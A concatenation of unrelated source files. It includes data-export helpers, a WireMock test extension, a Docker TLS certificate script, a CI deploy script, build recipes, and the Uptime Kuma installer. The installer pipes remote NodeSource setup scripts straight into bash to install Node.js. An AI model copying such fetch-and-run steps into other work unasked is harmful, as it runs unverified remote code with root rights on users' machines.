exports.exportTransportsHistory = async (startDate, endDate, credentials) => {
  const rows = [];
  const events = await EventRepository.getEventsByDayAndAuxiliary(
    startDate,
    endDate,
    get(credentials, 'company._id')
  );
  const distanceMatrix = await DistanceMatrixHelper.getDistanceMatrices(credentials);
  // Alphabetical by auxiliary lastname so the export is grouped per person.
  const sortedEventsByAuxiliary = events
    .sort((a, b) => (a.auxiliary.identity.lastname).localeCompare(b.auxiliary.identity.lastname));
  for (const group of sortedEventsByAuxiliary) {
    const sortedEventsByDayList = group.eventsByDay.sort((a, b) => DatesHelper.ascendingSort('startDate')(a[0], b[0]));
    for (const eventsGroupedByDay of sortedEventsByDayList) {
      const sortedEvents = [...eventsGroupedByDay].sort(DatesHelper.ascendingSort('startDate'));
      // Start at 1: each transport links event i-1 to event i.
      for (let i = 1; i < sortedEvents.length; i++) {
        const {
          duration,
          travelledKm,
          origins,
          destinations,
          transportDuration,
          breakDuration,
          pickTransportDuration,
        } = await DraftPayHelper.getPaidTransportInfo(
          { ...sortedEvents[i], auxiliary: group.auxiliary },
          { ...sortedEvents[i - 1], auxiliary: group.auxiliary },
          distanceMatrix
        );
        rows.push({
          'Id de l\'auxiliaire': get(group, 'auxiliary._id', '').toHexString(),
          'Prénom de l\'auxiliaire': get(group, 'auxiliary.identity.firstname', ''),
          'Nom de l\'auxiliaire': get(group, 'auxiliary.identity.lastname', ''),
          'Heure de départ du trajet': CompaniDate(sortedEvents[i - 1].endDate).format('dd/LL/yyyy HH:mm:ss'),
          'Heure d\'arrivée du trajet': CompaniDate(sortedEvents[i].startDate).format('dd/LL/yyyy HH:mm:ss'),
          'Adresse de départ': origins,
          'Adresse d\'arrivée': destinations,
          Distance: UtilsHelper.formatFloatForExport(travelledKm, 3),
          'Mode de transport': EVENT_TRANSPORT_MODE_LIST[
            get(group, 'auxiliary.administrative.transportInvoice.transportType')
          ],
          // Durations come back in minutes; exported as decimal hours.
          'Durée du trajet': UtilsHelper
            .formatFloatForExport(CompaniDuration({ minutes: transportDuration }).asHours(), 4),
          'Durée inter vacation': UtilsHelper
            .formatFloatForExport(CompaniDuration({ minutes: breakDuration }).asHours(), 4),
          // When the transport duration is picked, the break is NOT counted.
          'Pause prise en compte': pickTransportDuration ? 'Non' : 'Oui',
          'Durée rémunérée': UtilsHelper
            .formatFloatForExport(CompaniDuration({ minutes: duration }).asHours(), 4),
        });
      }
    }
  }
  return rows.length ? [Object.keys(rows[0]), ...rows.map(d => Object.values(d))] : [[NO_DATA]];
};
/**
 * Resolves a multiple-choice answer id to its display text.
 * @param {Array<Object>} answers - the card's possible answers ({_id, text})
 * @param {*} answerId - id of the selected answer
 * @returns {string} the answer text, or '' when the id is unknown
 */
const _findAnswerText = (answers, answerId) => {
  const matchingAnswer = answers.find(answer => UtilsHelper.areObjectIdsEquals(answer._id, answerId));
  return matchingAnswer ? matchingAnswer.text : '';
};
/**
 * Returns the answer(s) given for one questionnaire card as a comma-joined
 * string. Stringified ObjectIds are resolved to their multiple-choice text;
 * free-text answers are kept as-is.
 * @param {Object} questionnaireCard - the card being exported
 * @param {Array<Object>} questionnaireHistoryAnswersList - the history's answers
 * @returns {string} '' when the card was not answered
 */
const _getAnswerForExport = (questionnaireCard, questionnaireHistoryAnswersList) => {
  const answerForCard = questionnaireHistoryAnswersList
    .find(answer => UtilsHelper.areObjectIdsEquals(answer.card._id, questionnaireCard._id));
  if (!answerForCard) return '';

  const answerTexts = answerForCard.answerList.map((answer) => {
    if (!UtilsHelper.isStringedObjectId(answer)) return answer;
    return _findAnswerText(answerForCard.card.qcAnswers, answer);
  });

  return answerTexts.join();
};
/**
 * Exports end-of-course questionnaire answers submitted in [startDate, endDate]:
 * one row per questionnaire history, with one extra column per open/survey/QA card.
 * @param {Date|string} startDate - beginning of the export period
 * @param {Date|string} endDate - end of the export period
 * @returns {Promise<Array<Array>>} header row + one row per answer, or [[NO_DATA]]
 */
exports.exportEndOfCourseQuestionnaireHistory = async (startDate, endDate) => {
  const rows = [];
  // NOTE(review): assumes a single END_OF_COURSE questionnaire exists; a null
  // result would make `.histories` below throw — confirm this invariant.
  const endOfCourseQuestionnaire = await Questionnaire
    .findOne({ type: END_OF_COURSE })
    .populate({ path: 'cards', select: 'question template' })
    .populate({
      path: 'histories',
      match: { createdAt: { $gte: startDate, $lte: endDate } },
      populate: [
        {
          path: 'course',
          select: 'subProgram',
          populate: [
            { path: 'subProgram', select: 'name program', populate: { path: 'program', select: 'name' } },
            { path: 'trainer', select: 'identity' },
          ],
        },
        {
          path: 'user',
          select: 'identity local.email contact.phone company',
          populate: { path: 'company', populate: { path: 'company', select: 'name' } },
        },
        { path: 'questionnaireAnswersList.card', select: 'qcAnswers' },
      ],
    })
    .lean({ virtuals: true });
  for (const qHistory of endOfCourseQuestionnaire.histories) {
    // One column per answerable card, keyed by the card's question label.
    const questionsAnswers = endOfCourseQuestionnaire.cards
      .filter(card => [OPEN_QUESTION, SURVEY, QUESTION_ANSWER].includes(card.template))
      .reduce((acc, card) => ({
        ...acc,
        [card.question]: _getAnswerForExport(card, qHistory.questionnaireAnswersList),
      }), {});
    const row = {
      'Id formation': qHistory.course._id,
      Programme: get(qHistory, 'course.subProgram.program.name') || '',
      'Sous-programme': get(qHistory, 'course.subProgram.name'),
      'Prénom Nom intervenant(e)': UtilsHelper.formatIdentity(get(qHistory, 'course.trainer.identity') || '', 'FL'),
      Structure: get(qHistory, 'user.company.name'),
      'Date de réponse': CompaniDate(qHistory.createdAt).format('dd/LL/yyyy HH:mm:ss'),
      'Prénom Nom répondant(e)': UtilsHelper.formatIdentity(get(qHistory, 'user.identity') || '', 'FL'),
      'Mail répondant(e)': get(qHistory, 'user.local.email'),
      'Numéro de tél répondant(e)': get(qHistory, 'user.contact.phone') || '',
      ...questionsAnswers,
    };
    rows.push(row);
  }
  return rows.length ? [Object.keys(rows[0]), ...rows.map(d => Object.values(d))] : [[NO_DATA]];
};
|
<reponame>tsatam/data-as-a-board
/*
* Copyright (c) 2019 Ford Motor Company
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and limitations under the License.
*
*/
package com.ford.labs.daab;
import com.github.tomakehurst.wiremock.WireMockServer;
import com.github.tomakehurst.wiremock.core.WireMockConfiguration;
import org.junit.jupiter.api.extension.AfterEachCallback;
import org.junit.jupiter.api.extension.BeforeEachCallback;
import org.junit.jupiter.api.extension.ExtensionContext;
/**
 * JUnit 5 extension that starts a {@link WireMockServer} before each test and
 * stops it afterwards, so every test begins with a running mock HTTP server.
 */
public class WireMockExtension implements BeforeEachCallback, AfterEachCallback {
    // Created once per extension instance and reused across tests; never
    // reassigned, hence final.
    private final WireMockServer server;

    /** Base URL matching the default port used by the no-arg constructor. */
    public static final String WIREMOCK_URL = "http://localhost:8123";

    public WireMockExtension() {
        this(8123);
    }

    /**
     * @param port TCP port the WireMock server listens on
     */
    public WireMockExtension(int port) {
        server = new WireMockServer(
                WireMockConfiguration.options()
                        .port(port)
        );
    }

    /** @return the underlying server, e.g. for stubbing in tests */
    public WireMockServer getServer() {
        return server;
    }

    @Override
    public void beforeEach(ExtensionContext context) {
        server.start();
    }

    @Override
    public void afterEach(ExtensionContext context) {
        server.stop();
    }
}
|
#!/bin/bash
set -o errexit

# Generates a CA plus server and client TLS key pairs for protecting the Docker
# daemon socket, following:
# https://docs.docker.com/engine/security/protect-access/#create-a-ca-server-and-client-keys-with-openssl
#
# All parameters may be overridden via environment variables.
: "${COMPANY_DN:=/C=DE/ST=BW/L=Freiburg im Breisgau/O=My Company/OU=IT}"
: "${BITS:=4096}"
: "${DAYS:=365}"
: "${CA_DAYS:=${DAYS}}"
: "${SERVER_DAYS:=${DAYS}}"
: "${CLIENT_DAYS:=${DAYS}}"
: "${SERVER_CN:=localhost}"
: "${CLIENT_CN:=client}"
: "${SERVER_SAN_DNS:=${SERVER_CN}}"
: "${SERVER_SAN_IP:=127.0.0.1}"

CA_DN="${COMPANY_DN}/CN=Docker CA ${SERVER_CN}"
SERVER_DN="${COMPANY_DN}/CN=${SERVER_CN}"
CLIENT_DN="${COMPANY_DN}/CN=${CLIENT_CN}"

# Build the subjectAltName list: every DNS name, then every IP (if any).
SERVER_SAN="DNS:${SERVER_CN},DNS:${SERVER_SAN_DNS//,/,DNS:}"
if test -n "${SERVER_SAN_IP}"; then
    SERVER_SAN="${SERVER_SAN},IP:${SERVER_SAN_IP//,/,IP:}"
fi

echo "### Generate CA key pair with ${BITS} bits:"
openssl genrsa \
    -out ca-key.pem \
    "${BITS}"

# Message fixed: the CA certificate is valid CA_DAYS days (not DAYS) and the
# value printed is a DN, not a DNS name.
echo "### Create CA certificate with ${CA_DAYS} days validity and DN <${CA_DN}>:"
openssl req \
    -new \
    -x509 \
    -days "${CA_DAYS}" \
    -subj "${CA_DN}" \
    -sha256 \
    -key ca-key.pem \
    -out ca.pem

echo "### Generate server key pair with ${BITS} bits:"
openssl genrsa \
    -out server-key.pem \
    "${BITS}"

echo "### Create CSR for server certificate with DN <${SERVER_DN}>:"
openssl req \
    -subj "${SERVER_DN}" \
    -sha256 \
    -new \
    -key server-key.pem \
    -out server.csr

echo "### Add extfile with SAN <${SERVER_SAN}>:"
# Truncate (>) instead of appending (>>) so a leftover file from an aborted
# previous run cannot inject stale extensions.
cat >extfile.cnf <<EOF
subjectAltName = ${SERVER_SAN}
extendedKeyUsage = serverAuth
EOF

echo "### Issue server certificate:"
openssl x509 \
    -req \
    -days "${SERVER_DAYS}" \
    -sha256 \
    -in server.csr \
    -CA ca.pem \
    -CAkey ca-key.pem \
    -CAcreateserial \
    -out server.pem \
    -extfile extfile.cnf

echo "### Generate client key pair:"
openssl genrsa \
    -out key.pem \
    "${BITS}"

echo "### Create CSR for client certificate with DN <${CLIENT_DN}>:"
openssl req \
    -subj "${CLIENT_DN}" \
    -new \
    -key key.pem \
    -out client.csr

echo "### Add extfile for client certificate:"
cat >extfile-client.cnf <<EOF
extendedKeyUsage = clientAuth
EOF

echo "### Issue client certificate:"
openssl x509 \
    -req \
    -days "${CLIENT_DAYS}" \
    -sha256 \
    -in client.csr \
    -CA ca.pem \
    -CAkey ca-key.pem \
    -CAcreateserial \
    -out cert.pem \
    -extfile extfile-client.cnf

echo "### Set permissions on private keys and certificates"
chmod -v 0400 ca-key.pem key.pem server-key.pem
chmod -v 0444 ca.pem server.pem cert.pem

echo "### Remove temporary files"
rm -v client.csr server.csr extfile.cnf extfile-client.cnf
|
import nltk
import numpy as np
import random
import string
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity
def create_chatbot():
    """Run a small rule-based console chatbot.

    Greets the user when the input contains a greeting word, answers a few
    canned programming questions, and exits on 'bye', 'thanks' or 'thank you'.
    Blocks on stdin until the conversation ends.
    """
    greetings = ["hi", "hey", "hello", "hola", "greetings", "wassup", "yo"]
    # Renamed consistently: the original defined `greet_response` but every
    # caller referenced `greet_responses`, raising NameError at runtime.
    greet_responses = ["hey there friend!", "hi there! How can I help you?", "hello! What would you like to know?"]
    question_responses = {
        "what is python?": "Python is a widely-used general-purpose, high-level programming language.",
        "who created python?": "Python was created in the late 1980s by Guido van Rossum, and released in 1991.",
        "what is java": "Java is a class-based, object-oriented programming language developed by Sun Microsystems in the 1990s."
    }

    # tokenize the user's input string (requires nltk 'punkt' data)
    def tokenize(user_input):
        return nltk.word_tokenize(user_input)

    # generate a response from the chatbot, or None when nothing matches
    def response(user_input):
        # check if the user's input contains a greeting word
        for token in tokenize(user_input):
            if token.lower() in greetings:
                return random.choice(greet_responses)
        # Match the whole normalized input against the known questions: keys are
        # full sentences, so comparing single tokens could never match them.
        normalized = user_input.lower().strip()
        if normalized in question_responses:
            return question_responses[normalized]
        return None

    print("Hello! I'm your friendly programming chatbot. What can I help you with?")
    while True:
        user_input = input().lower()
        if user_input == 'bye':
            print("Bye! Have a nice day!")
            break
        if user_input in ('thanks', 'thank you'):
            print("My pleasure!")
            break
        # Compute the reply once instead of calling response() twice per turn.
        chatbot_response = response(user_input)
        if chatbot_response is not None:
            print(chatbot_response)
        else:
            print("I'm sorry, I don't understand. Can you ask in a different way?")
/**
 * Deep-clone a plain value: objects and arrays are copied recursively,
 * primitives (and null/undefined) are returned as-is.
 *
 * Fixes in this revision:
 *  - `const clonedArray = [cloningField.length]` created a one-element array
 *    holding the length, so empty arrays cloned to `[0]`.
 *  - Array elements were unconditionally recursed, turning primitives into
 *    `{}` (Object.keys of a primitive is empty).
 *  - `typeof null === 'object'`, so object fields holding null crashed in
 *    `Object.keys(null)`.
 *
 * Note: the copy is deep but structural only -- Dates, Maps, Sets, functions
 * and class instances are not specially handled.
 *
 * @param {*} from - value to clone (typically a plain object)
 * @returns {*} a deep copy sharing no mutable structure with `from`
 */
function cloneObj(from) {
  // Primitives, functions, null and undefined need no copying.
  if (from === null || typeof from !== 'object') {
    return from;
  }
  if (Array.isArray(from)) {
    return from.map((element) => cloneObj(element));
  }
  const to = {};
  for (const key of Object.keys(from)) {
    to[key] = cloneObj(from[key]);
  }
  return to;
}
module.exports = cloneObj;
|
<filename>Develop/assets/script.js
//global variables
var body = document.body; // NOTE(review): not referenced in the visible code -- confirm before removing
var currentHour = moment().hour(); // current hour of day, 0-23 (moment.js)
var tableBody = document.getElementById('tbody');
//place the current day under the description line in the header
var day = moment().format("dddd, MMMM Do"); // e.g. "Friday, July 4th"
$("#currentDay").text(day);
// Save the value of the <input> paired with the clicked save button.
// Each save button carries id = rowId + 100 and its input carries id = rowId,
// so subtracting 100 from the button id yields the paired input's id.
// The value is persisted in localStorage under the input's id, so the key is
// the row (zero-indexed by hour) and the value is the last saved task.
function onSaveBtnClick(event)
{
    // `this` is the clicked button; recover the paired input's numeric id.
    var inputId = parseInt(this.id, 10) - 100;
    var thisInput = document.getElementById(inputId.toString());
    var task = thisInput.value;
    // Store unconditionally: saving an empty string deliberately clears any
    // task previously stored for this row.  The original code had two
    // identical branches for empty/non-empty input; they are collapsed here.
    localStorage.setItem(inputId.toString(), task);
}
//adding the rows to the table
//Rows cover i = 8..17; the label shown is (1 + i) with a 12-hour wrap, i.e.
//"9 AM" through "6 PM".
for (var i = 8; i < 18; i++)
{
    //creating the individual row and columns of the table
    var tr = document.createElement("tr");
    tableBody.appendChild(tr);
    var section1 = document.createElement("td");
    var section2 = document.createElement("td");
    var section3 = document.createElement("td");
    tr.appendChild(section1);
    tr.appendChild(section2);
    tr.appendChild(section3);
    //setting up the individual hour sections - or the first column
    //this if statment goes till 23 because i have originally set up for this loop to go through
    //all 24 hours of the day (and it does do it), and therefore if someone wants to change it back
    //i just needs to equal 0 and i < 24 not 18. I didn't have it in my to take away from this if
    //statement... i like it too much so i don't want to cut out the last else if statement and change 23 to 18.
    if (i < 11)
    {
        section1.textContent = (1 + i).toString() + " AM";
    }
    else if (i == 11)
    {
        section1.textContent = (1 + i).toString() + " PM";
    }
    else if (i > 11 && i < 23)
    {
        section1.textContent = (1 + (i - 12)).toString() + " PM";
    }
    else if (i == 23)
    {
        section1.textContent = (1 + (i - 12)).toString() + " AM";
    }
    //setting up the middle section - the second column
    var writeTask = document.createElement("input");
    writeTask.setAttribute("id", i.toString());
    writeTask.type = "text";
    writeTask.value = "";
    section2.appendChild(writeTask);
    //this takes the appended input above and sets its current value to what was last saved in that rows localStorage key set
    var value = localStorage.getItem(i.toString());
    if (value != null)
    {
        writeTask.value = value;
    }
    //section2.innerHTML = "<input></input>";
    //this sets the backgroundColor for the second column of the table off of the current hour
    //(past rows grey, the current row red, future rows green)
    if (i < (currentHour - 1))
    {
        section2.style.backgroundColor = "whitesmoke";
    } else if (i == (currentHour - 1))
    {
        section2.style.backgroundColor = "lightcoral";
    } else
    {
        section2.style.backgroundColor = "lightgreen";
    }
    //setting up the third section - the third column
    var buttonImage = document.createElement("img");
    buttonImage.src = './Develop/assets/images/noun-save-2269969.png';
    buttonImage.style = 'width: 30px; height: 30px;';
    var saveBtn = document.createElement("button");
    //the id attribute set below is set to change with the i which is great cause then its unique
    //and then can be linked to a corresponding input which also follows the i to string format (except it doesn't add 100,
    //cause then there would be two of the same id and therefore would not work)
    saveBtn.setAttribute("id", (i + 100).toString());
    //this then connects the button with the top function that will then store the individual task two inputs
    saveBtn.addEventListener("click", onSaveBtnClick);
    saveBtn.appendChild(buttonImage);
    section3.appendChild(saveBtn);
    //this sets the content of the saveBtn and section3 using innerHTML (there is also another commented out line with this format in section 2)
    //this is another way to approach the problem but innerHTML has security issues and it is highly recommended to stay away from using it
    //saveBtn.innerHTML = "<img src='./assets/images/noun-save-2269969.png' style= 'width: 25px; height: 25px;'></img>"
    //section3.innerHTML = "<button><img src='./assets/images/noun-save-2269969.png' style= 'width: 25px; height: 25px;'></button>"
    //when currentHour reaches the end of the day, everything gets cleared
    //new day = new toDo list
    //NOTE(review): moment().hour() returns 0-23, so this branch can never run;
    //the intended midnight localStorage reset needs a different trigger -- confirm.
    if (currentHour == 24)
    {
        localStorage.clear();
    }
}
|
#!/bin/sh
# CI deploy script: package the built jar into a Docker image, push it to the
# dev registry, then (re)deploy the service on Rancher via rancher-compose.
cd /$CI_PROJECT_DIR/$PACKAGE_PATH
cp -r /sharefile /$CI_PROJECT_DIR/$PACKAGE_PATH
# Generate a throwaway dockerfile for the service image.
echo "FROM base-openjdk
COPY $PACKAGE_NAME /opt
COPY sharefile /sharefile
CMD java -Dfile.encoding=UTF-8 -Duser.timezone=Asia/Shanghai -jar /opt/$PACKAGE_NAME" > dockerfile
docker build --no-cache -t $DOCKER_REGISTRY_DEV/$CI_PROJECT_NAME .
# Clean up dangling images left behind by the rebuild.
docker images --no-trunc --all --quiet --filter="dangling=true" | xargs --no-run-if-empty docker rmi
docker push $DOCKER_REGISTRY_DEV/$CI_PROJECT_NAME
# Rancher service definition (anti-affinity so replicas land on different hosts).
echo "version: '2'
services:
$CI_PROJECT_NAME:
image: $DOCKER_REGISTRY_DEV/$CI_PROJECT_NAME
stdin_open: true
volumes:
- /opt/logs:/opt/logs
tty: true
labels:
io.rancher.container.pull_image: always
io.rancher.scheduler.affinity:container_label_ne: io.rancher.stack_service.name=biz/$CI_PROJECT_NAME" > docker.yml
# Rancher scale/health-check settings.
# NOTE(review): in the request_line entry below, the inner double quotes
# close/reopen the shell string, so the emitted YAML contains NO quotes around
# the URL -- confirm Rancher accepts the unquoted form.
echo "version: '2'
services:
$CI_PROJECT_NAME:
scale: $CONTAINER_SCALE
start_on_create: true
health_check:
response_timeout: 2000
healthy_threshold: 2
port: $CONTAINER_PORT
unhealthy_threshold: 3
initializing_timeout: 60000
interval: 2000
strategy: none
request_line: GET "$HEALTH_CHECK_URL" "HTTP/1.0"
reinitializing_timeout: 60000" > rancher.yml
# Rolling upgrade: one container at a time, auto-confirm.
/home/gitlab-runner/rancher-compose/rancher-compose --url $RANCHER_URL_DEV --access-key $RANCHER_ACCESS_KEY_DEV --secret-key $RANCHER_SECRET_KEY_DEV -f docker.yml -r rancher.yml -p biz up --force-upgrade --batch-size 1 --interval "3000" -d --confirm-upgrade
|
# Termux build recipe: xfce4-eyes-plugin -- eyes in the Xfce panel that
# follow the cursor (xeyes-style).
TERMUX_PKG_HOMEPAGE=https://docs.xfce.org/panel-plugins/xfce4-eyes-plugin/start
TERMUX_PKG_DESCRIPTION="This plugin adds eyes to the Xfce panel which follow your cursor, similar to the xeyes program."
TERMUX_PKG_LICENSE="GPL-2.0"
TERMUX_PKG_MAINTAINER="Yisus7u7 <jesuspixel5@gmail.com>"
TERMUX_PKG_VERSION=4.5.1
TERMUX_PKG_REVISION=1
TERMUX_PKG_SRCURL=https://archive.xfce.org/src/panel-plugins/xfce4-eyes-plugin/4.5/xfce4-eyes-plugin-${TERMUX_PKG_VERSION}.tar.bz2
TERMUX_PKG_SHA256=4db780178e529391d53da180e49386904e69a5a33b3bd5185835d0a7e6ff5ac5
TERMUX_PKG_DEPENDS="gtk3, atk, libcairo, pango, harfbuzz, gdk-pixbuf, glib, libxfce4util, libxfce4ui, xfce4-panel"
TERMUX_PKG_BUILD_IN_SRC=true
|
package org.rudogma.bytownite.encoders
import org.rudogma.bytownite.{FixedLength, NotNullable}
/** Fixed-width (exactly one byte), non-nullable encoder for a single `Byte`. */
object ByteEncoder extends Encoder[Byte] with FixedLength with NotNullable {

  /** Every encoded value occupies exactly one byte. */
  override def blockLength: Int = 1

  /** Wrap the byte in a one-element array. */
  override def encode(value: Byte): Array[Byte] = Array(value)
}
|
<reponame>JoeELToukhy/WebScraperGeneratorGUI
// Firebase project configuration for the web-scraper app.
// NOTE(review): apiKey is redacted ("<KEY>") in this copy -- the real key must
// be supplied (e.g. from the Firebase console) before this config is usable.
module.exports = {
  apiKey: "<KEY>",
  authDomain: "webscraper-270ff.firebaseapp.com",
  databaseURL: "https://webscraper-270ff.firebaseio.com",
  projectId: "webscraper-270ff",
  storageBucket: "webscraper-270ff.appspot.com",
  messagingSenderId: "712541248468",
  appId: "1:712541248468:web:36d972eaea10bc26b71441",
  measurementId: "G-T0QCTR3F9D"
};
#!/bin/bash
# Build the aditof SDK for a Jetson-based 3D smart camera: first build pinned
# third-party deps (build dirs are named after their versions) into /opt, then
# the SDK itself, then install the public tof_process components (git-lfs).
cd ~/Workspace/aditof_sdk/deps
# --- glog (build_0_3_5) ---
cd glog
sudo rm -rf build_0_3_5
mkdir build_0_3_5 && cd build_0_3_5
cmake -DWITH_GFLAGS=off -DCMAKE_INSTALL_PREFIX=/opt/glog ..
sudo cmake --build . --target install
cd ../..
# --- libwebsockets (build_3_1) ---
cd libwebsockets
sudo rm -rf build_3_1
mkdir build_3_1 && cd build_3_1
cmake -DLWS_STATIC_PIC=ON -DCMAKE_INSTALL_PREFIX=/opt/websockets ..
sudo cmake --build . --target install
cd ../..
# --- protobuf (build_3_9_0) ---
cd protobuf
sudo rm -rf build_3_9_0
mkdir build_3_9_0 && cd build_3_9_0
cmake -Dprotobuf_BUILD_TESTS=OFF -DCMAKE_POSITION_INDEPENDENT_CODE=ON -DCMAKE_INSTALL_PREFIX=/opt/protobuf ../cmake
sudo cmake --build . --target install
cd ../..
# --- aditof SDK (fresh build against the /opt deps above) ---
cd ~/Workspace/aditof_sdk/
git pull
git fetch
sudo rm -rf build
mkdir build && cd build
cmake -DUSE_3D_SMART=1 -DJETSON=1 -DCMAKE_PREFIX_PATH="/opt/glog;/opt/protobuf;/opt/websockets" ..
make -j8
# Desktop shortcut for the demo + VNC access.
cd ~/Workspace/aditof_sdk/scripts/3dsmartcam1
cp aditof-demo.sh ~/Desktop/
./vnc_install.sh
# --- tof_process components (large binaries via git-lfs) ---
cd ~/Workspace/
sudo apt install git-lfs
git clone https://github.com/robotics-ai/tof_process_public
cd tof_process_public
git lfs install
cd adi_smart_camera/
git lfs fetch --all
git lfs pull
./install_bionic_nano.sh
|
var config = require('../../core/util.js').getConfig();
var watch = config.watch;
var exchangeLowerCase = watch.exchange.toLowerCase();
var settings = {
exchange: watch.exchange,
pair: [watch.currency, watch.asset],
historyCollection: `${exchangeLowerCase}_candles`,
adviceCollection: `${exchangeLowerCase}_advices`
};
module.exports = {
settings
};
|
#!/bin/bash
# Load BUCKET_NAME (and any other settings) from the local .env file, then
# create the Cloud Storage bucket.
source .env
gsutil mb gs://$BUCKET_NAME
# install.sh is generated by ./extra/install.batsh, do not modify it directly.
# "npm run compile-install-script" to compile install.sh
# The command is working on Windows PowerShell and Docker for Windows only.
# curl -o kuma_install.sh https://raw.githubusercontent.com/louislam/uptime-kuma/master/install.sh && sudo bash kuma_install.sh
"echo" "-e" "====================="
"echo" "-e" "Uptime Kuma Installer"
"echo" "-e" "====================="
"echo" "-e" "Supported OS: CentOS 7/8, Ubuntu >= 16.04 and Debian"
"echo" "-e" "---------------------------------------"
"echo" "-e" "This script is designed for Linux and basic usage."
"echo" "-e" "For advanced usage, please go to https://github.com/louislam/uptime-kuma/wiki/Installation"
"echo" "-e" "---------------------------------------"
"echo" "-e" ""
"echo" "-e" "Local - Install Uptime Kuma in your current machine with git, Node.js 14 and pm2"
"echo" "-e" "Docker - Install Uptime Kuma Docker container"
"echo" "-e" ""
if [ "$1" != "" ]; then
type="$1"
else
"read" "-p" "Which installation method do you prefer? [DOCKER/local]: " "type"
fi
defaultPort="3002"
function checkNode {
local _0
nodeVersion=$(node -e 'console.log(process.versions.node.split(`.`)[0])')
"echo" "-e" "Node Version: ""$nodeVersion"
_0="12"
if [ $(($nodeVersion < $_0)) == 1 ]; then
"echo" "-e" "Error: Required Node.js 14"
"exit" "1"
fi
if [ "$nodeVersion" == "12" ]; then
"echo" "-e" "Warning: NodeJS ""$nodeVersion"" is not tested."
fi
}
function deb {
nodeCheck=$(node -v)
apt --yes update
if [ "$nodeCheck" != "" ]; then
"checkNode"
else
# Old nodejs binary name is "nodejs"
check=$(nodejs --version)
if [ "$check" != "" ]; then
"echo" "-e" "Error: 'node' command is not found, but 'nodejs' command is found. Your NodeJS should be too old."
exit 1
fi
curlCheck=$(curl --version)
if [ "$curlCheck" == "" ]; then
"echo" "-e" "Installing Curl"
apt --yes install curl
fi
"echo" "-e" "Installing Node.js 14"
curl -sL https://deb.nodesource.com/setup_14.x | bash - > log.txt
apt --yes install nodejs
node -v
nodeCheckAgain=$(node -v)
if [ "$nodeCheckAgain" == "" ]; then
"echo" "-e" "Error during Node.js installation"
exit 1
fi
fi
check=$(git --version)
if [ "$check" == "" ]; then
"echo" "-e" "Installing Git"
apt --yes install git
fi
}
if [ "$type" == "local" ]; then
defaultInstallPath="/opt/uptime-kuma"
if [ -e "/etc/redhat-release" ]; then
os=$("cat" "/etc/redhat-release")
distribution="rhel"
else
if [ -e "/etc/issue" ]; then
os=$(head -n1 /etc/issue | cut -f 1 -d ' ')
if [ "$os" == "Ubuntu" ]; then
distribution="ubuntu"
fi
if [ "$os" == "Debian" ]; then
distribution="debian"
fi
fi
fi
arch=$(uname -i)
"echo" "-e" "Your OS: ""$os"
"echo" "-e" "Distribution: ""$distribution"
"echo" "-e" "Arch: ""$arch"
if [ "$3" != "" ]; then
port="$3"
else
"read" "-p" "Listening Port [$defaultPort]: " "port"
if [ "$port" == "" ]; then
port="$defaultPort"
fi
fi
if [ "$2" != "" ]; then
installPath="$2"
else
"read" "-p" "Installation Path [$defaultInstallPath]: " "installPath"
if [ "$installPath" == "" ]; then
installPath="$defaultInstallPath"
fi
fi
# CentOS
if [ "$distribution" == "rhel" ]; then
nodeCheck=$(node -v)
if [ "$nodeCheck" != "" ]; then
"checkNode"
else
curlCheck=$(curl --version)
if [ "$curlCheck" == "" ]; then
"echo" "-e" "Installing Curl"
yum -y -q install curl
fi
"echo" "-e" "Installing Node.js 14"
curl -sL https://rpm.nodesource.com/setup_14.x | bash - > log.txt
yum install -y -q nodejs
node -v
nodeCheckAgain=$(node -v)
if [ "$nodeCheckAgain" == "" ]; then
"echo" "-e" "Error during Node.js installation"
exit 1
fi
fi
check=$(git --version)
if [ "$check" == "" ]; then
"echo" "-e" "Installing Git"
yum -y -q install git
fi
# Ubuntu
else
if [ "$distribution" == "ubuntu" ]; then
"deb"
# Debian
else
if [ "$distribution" == "debian" ]; then
"deb"
else
# Unknown distribution
error=$((0))
check=$(git --version)
if [ "$check" == "" ]; then
error=$((1))
"echo" "-e" "Error: git is missing"
fi
check=$(node -v)
if [ "$check" == "" ]; then
error=$((1))
"echo" "-e" "Error: node is missing"
fi
if [ $(($error > 0)) == 1 ]; then
"echo" "-e" "Please install above missing software"
exit 1
fi
fi
fi
fi
check=$(pm2 --version)
if [ "$check" == "" ]; then
"echo" "-e" "Installing PM2"
npm install pm2 -g
pm2 startup
fi
mkdir -p $installPath
cd $installPath
git clone https://github.com/louislam/uptime-kuma.git .
npm run setup
pm2 start server/server.js --name uptime-kuma -- --port=$port
else
defaultVolume="uptime-kuma"
check=$(docker -v)
if [ "$check" == "" ]; then
"echo" "-e" "Error: docker is not found!"
exit 1
fi
check=$(docker info)
if [[ "$check" == *"Is the docker daemon running"* ]]; then
"echo" "Error: docker is not running"
"exit" "1"
fi
if [ "$3" != "" ]; then
port="$3"
else
"read" "-p" "Expose Port [$defaultPort]: " "port"
if [ "$port" == "" ]; then
port="$defaultPort"
fi
fi
if [ "$2" != "" ]; then
volume="$2"
else
"read" "-p" "Volume Name [$defaultVolume]: " "volume"
if [ "$volume" == "" ]; then
volume="$defaultVolume"
fi
fi
"echo" "-e" "Port: $port"
"echo" "-e" "Volume: $volume"
docker volume create $volume
docker run -d --restart=always -p $port:3002 -v $volume:/app/data --name uptime-kuma louislam/uptime-kuma:1
fi
"echo" "-e" "http://localhost:$port"
|
export {
ViewData
} from "./view-data";
|
""" BTCUSD Price Reporter
Example of a subclassed Reporter.
"""
import asyncio
import json
from typing import Any
from typing import Mapping
import requests
from telliot.datafeed.data_feed import DataFeed
from telliot.reporter.base import Reporter
from telliot.submitter.base import Submitter
from telliot.utils.abi import tellor_playground_abi
from web3 import Web3
# TODO: placeholder for actual ConfigOptions clas
temp_config = {"node_url": "", "private_key": ""}
class RinkebySubmitter(Submitter):
    """Submits BTC on testnet.

    Submits BTC price data in USD to the TellorX playground
    on the Rinkeby test network."""

    def __init__(self, config: Mapping[str, str]) -> None:
        """Reads user private key and node endpoint from `.env` file to
        set up `Web3` client for interacting with the TellorX playground
        smart contract.

        Expects config keys "node_url" and "private_key".
        """
        self.config = config
        self.w3 = Web3(Web3.HTTPProvider(config["node_url"]))
